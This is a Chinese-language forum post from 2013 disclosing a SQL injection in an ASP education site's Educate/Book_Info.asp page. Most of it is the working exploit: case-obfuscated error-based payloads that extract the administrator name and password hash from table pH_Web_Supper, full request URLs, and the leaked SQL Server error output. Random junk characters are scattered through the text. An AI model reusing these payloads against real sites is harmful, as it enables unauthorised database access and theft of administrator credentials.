漏洞出现在Educate/Book_Info.asp
; U5 g9 |( j( U, H : a/ x9 n5 x3 V
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出( Q- E. V( [! ^5 i' \& L4 O# H& L
" ^9 v9 |% P0 c: y! A' s
exp:如下 r) N% Q: I3 W7 A7 m1 }" C5 a
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)1 u: j# v. T+ U
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ `0 D% h' s2 q: j0 M4 \+ \ 3 X& \3 t/ g! |/ r, m" }2 @6 F6 r# t
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
+ s, h z; p/ N" o
+ m: Y2 m1 D6 ?0 j. K2 VMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
- L. R7 C) `$ r+ T7 i
8 C: }: q8 y. K, O将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。7 j) [% L: b! k/ \
3 r L! w/ @- t$ q& ]2 {$ T) q7 y/Educate/Book_Info.asp,行 85 c& ?: }6 i- X2 w6 M5 E! I
* f9 p) j8 @( qhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ q! j7 s; N& f3 c
$ `: l& D: I Y4 ~Microsoft OLE DB Provider for SQL Server 错误 '80040e07'0 n0 j3 ?, A4 |( @; i
! A% Z, p. T- s$ W$ Y( U
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。! K2 r% m) \2 E- v) B
2 U$ i! `7 `7 C
/Educate/Book_Info.asp,行 8
. E* ~2 C# q% f9 C: T |
发表于 2013-2-16 21:44:16
收藏
支持
反对